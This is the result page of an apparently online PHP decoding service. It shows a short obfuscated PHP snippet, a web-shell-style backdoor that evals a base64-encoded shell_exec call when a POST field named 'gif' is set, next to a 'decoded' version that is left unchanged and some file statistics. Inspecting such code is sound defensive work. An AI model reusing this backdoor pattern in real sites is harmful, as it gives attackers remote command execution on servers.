Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $TAGs = @$_POST["gif"]; if(isset($TAGs) && !empty($TAGs)) { eval(b..

Decoded Output download

<?php  
  
$TAGs = @$_POST["gif"];  
  
if(isset($TAGs) && !empty($TAGs))  
{  
    eval(base64_decode("CiBlY2hvIHNoZWxsX2V4ZWMoJGtleUJpdHJpeCk7IA=="));  
}  
  
?>

Did this file decode correctly?

Original Code

<?php 
 
$TAGs = @$_POST["gif"]; 
 
if(isset($TAGs) && !empty($TAGs)) 
{ 
    eval(base64_decode("CiBlY2hvIHNoZWxsX2V4ZWMoJGtleUJpdHJpeCk7IA==")); 
} 
 
?>

Function Calls

None

Variables

$TAGs None

Stats

MD5 1b538c6719477a5737e87106b3490231
Eval Count 0
Decode Time 54 ms